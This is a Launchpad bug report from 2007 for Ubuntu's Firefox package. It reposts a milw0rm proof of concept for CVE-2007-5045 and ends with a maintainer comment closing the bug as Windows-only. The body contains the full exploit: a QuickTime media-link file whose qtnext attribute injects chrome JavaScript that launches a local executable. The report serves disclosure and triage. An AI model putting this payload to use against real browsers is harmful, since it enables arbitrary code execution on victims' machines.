Ubuntu
firefox package

Mozilla Firefox + QuickTime Command Execution

Bug #139258 reported by Kyle M Weller on 2007-09-13

254

Affects		Status	Importance	Assigned to	Milestone
	firefox (Ubuntu)	Invalid	Undecided	Kees Cook

Bug Description

Mozilla Firefox, Swiftfox, and other mozilla browsers are effected
<!--
http://www.gnucitizen.org/blog/0day-quicktime-pwns-firefox

It seams that QuickTime media formats can hack into Firefox.
The result of this vulnerability can lead to full compromise of
the browser and maybe even the underlaying operating system.
Don\u2019t try this at home.
-->

<?xml version="1.0">
<?quicktime type="application/x-quicktime-media-link"?>
<embed src="a.mp3" autoplay="true" qtnext="-chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].createInstance(Components.interfaces.nsILocalFile);file.initWithPath('c:\\windows\\system32\\calc.exe');process=Components.classes['@mozilla.org/process/util;1'].createInstance(Components.interfaces.nsIProcess);process.init(file);process.run(true,[],0);void(0);"/>

# milw0rm.com [2007-09-12]

CVE References

2007-5045

Revision history for this message

Kees Cook (kees) wrote on 2007-10-01:

This is CVE-2007-5045. It does not affect Ubuntu -- it is a Windows-only problem.

Changed in firefox:
assignee:	nobody → keescook
status:	New → Invalid

Report a bug

This report contains Public Security information

Everyone can see this security related information.

You are

Subscribing...

Edit bug mail

Other bug subscribers

Remote bug watches

Bug watches keep track of this bug in other bug trackers.

Ubuntufirefox package